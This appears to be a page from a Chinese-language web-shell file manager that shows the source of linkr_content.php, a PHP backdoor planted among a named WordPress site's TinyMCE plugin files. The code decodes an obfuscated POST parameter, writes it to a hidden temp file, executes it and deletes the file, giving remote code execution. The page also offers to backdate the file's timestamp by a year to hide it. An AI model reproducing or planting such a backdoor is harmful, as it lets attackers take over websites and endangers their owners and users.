文件操作 - linkr_content.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/vec.uaysen.cl/html/wp-includes/js/tinymce/plugins/wordpress/linkr_content.php
编辑文件内容
<?php if(!empty($_POST["\x6Bey"])){ $hld = array_filter(["/var/tmp", session_save_path(), "/dev/shm", sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), getenv("TMP")]); $value = $_POST["\x6Bey"]; $value = explode ( '.' ,$value) ; $parameter_group=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($salt); $s=0; array_walk($value, function ($v8) use (&$parameter_group, &$s, $salt, $sLen) { $chS=ord($salt[$s % $sLen]); $dec=((int)$v8 - $chS - ($s % 10)) ^ 10; $parameter_group .= chr($dec); $s++;}); for ($factor = 0, $data_chunk = count($hld); $factor < $data_chunk; $factor++) { $item = $hld[$factor]; if (!!is_dir($item) && !!is_writable($item)) { $resource = vsprintf("%s/%s", [$item, ".mrk"]); $file = fopen($resource, 'w'); if ($file) { fwrite($file, $parameter_group); fclose($file); include $resource; @unlink($resource); exit; } } } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件